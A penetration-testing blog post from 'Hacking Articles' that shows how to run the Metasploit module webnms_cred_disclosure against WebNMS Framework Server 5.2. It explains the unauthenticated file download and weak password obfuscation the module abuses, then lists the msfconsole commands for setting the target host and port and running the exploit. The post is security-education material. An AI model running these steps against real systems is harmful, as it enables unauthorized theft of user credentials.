Pages

  • Home
  • Author
skip to main | skip to sidebar

Hacking Articles|Raj Chandel's Blog

RSS Feed

Gather Credential of WebNMS Framework Server using Metasploit

at 9:16 AM Thursday, July 21, 2016
This module abuses two vulnerabilities in WebNMS Framework Server 5.2 to extract all user credentials. The first vulnerability is a unauthenticated file download in the FetchFile servlet, which is used to download the file containing the user credentials. The second vulnerability is that the the passwords in the file are obfuscated with a very weak algorithm which can be easily reversed. This module has been tested with WebNMS Framework Server 5.2 and 5.2 SP1 on Windows and Linux.

Exploit Targets
WebNMS Framework Server 5.2

Requirement
Attacker: kali Linux
Victim PC: WebNMS Framework Server 5.2


Open Kali terminal type msfconsole


Now type use auxiliary/admin/http/webnms_cred_disclosure
msf exploit (webnms_cred_disclosure)>set rhost 192.168.0.103 (IP of Remote Host)
msf exploit (webnms_cred_disclosure)>set rport 9090
msf exploit (webnms_cred_disclosure)>exploit           

Labels: Kali Linux, Penetration Testing

0 comments:

Post a Comment

Newer Post Older Post Home
Subscribe to: Post Comments (Atom)

Labels

  • Batch File tricks (8)
  • crytography (3)
  • CTF (100)
  • Cyber Forensics Tools (56)
  • DLL Hacking (6)
  • footprinting (2)
  • Google Hacking (1)
  • Hacking Tools (12)
  • Kali Linux (370)
  • others (5)
  • Penetration Testing (1354)
  • redteam (9)
  • Stegnography (7)
  • Windows Hacking (6)

Popular Posts

  • 64-bit Linux Assembly and Shellcoding
    Introduction Shellcodes are machine instructions that are used as a payload in the exploitation of a vulnerability. An exploit is a small ...
  • GreatSct - An Application Whitelist Bypass Tool
    While wrting Applocker bypass series , we found a new tool which was especially design for bypassing whitelisting application.  So Idecid...
  • Active Directory Enumeration: ldeep
     
  • Credential Dumping with NetExec (nxc)
     
  • 4 Ways to get Linux Privilege Escalation
    When you exploit the victim pc there would be certain limits which resist performing some action even after you are having the shell of vi...
  • Netexec for Pentester: File Transfer
     
  • Privacy Protection Mobile – Graphene OS Setup
     
  • Privacy Protection: Cover Your Tracks
     
  • Privacy Protection- Metadata Cleaner
     
  • Privacy Protection- Windows Privacy
     
 

Copyright 2010 Hacking Articles|Raj Chandel's Blog. Theme zBench Bloggerized by Who Got Eliminated for Sports Master

Δ Top